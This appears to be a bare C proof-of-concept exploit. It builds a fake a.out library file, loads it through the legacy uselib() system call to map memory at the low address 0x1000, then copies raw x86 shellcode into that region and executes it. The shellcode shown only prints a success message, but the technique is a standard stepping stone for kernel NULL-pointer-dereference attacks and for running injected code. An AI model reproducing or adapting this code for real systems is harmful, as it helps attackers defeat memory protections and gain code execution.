#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>

#define loadaddr 0x00001000
#define memsize (1<<20)

static const char *libname = "lib.a.out";
static struct {
	long magic, text, data, bss, syms, entry;
} hdr = {
	.magic = 0314,
	.text = memsize,
	.entry = loadaddr
};
static char sc[] = "\x31\xd2\x8d\x42\x04\x8d\x5a\x01\xeb\x07\x59\x83\xc2\x0d\xcd\x80\xc3\xe8\xf4\xff\xff\xff [+] success\n";

int main(void)
{
	int fd;

	fd = open(libname, O_CREAT | O_RDWR | O_TRUNC, 0755);
	if (fd == -1) {
		perror("open lib");
		return 0;
	}

	write(fd, &hdr, sizeof(hdr));
	lseek(fd, memsize - 1, SEEK_SET);
	write(fd, "x", 1);
	close(fd);

	printf(" [+] wrote library file\n");
	if (uselib(libname)) {
		perror("uselib");
		goto del;
	}
	printf(" [+] loaded library\n");

	memcpy((void *)hdr.entry, sc, sizeof(sc));

	printf(" [+] wrote shellcode\n");

	((void (*)(void))hdr.entry)();

del:
	unlink(libname);
	return 0;
}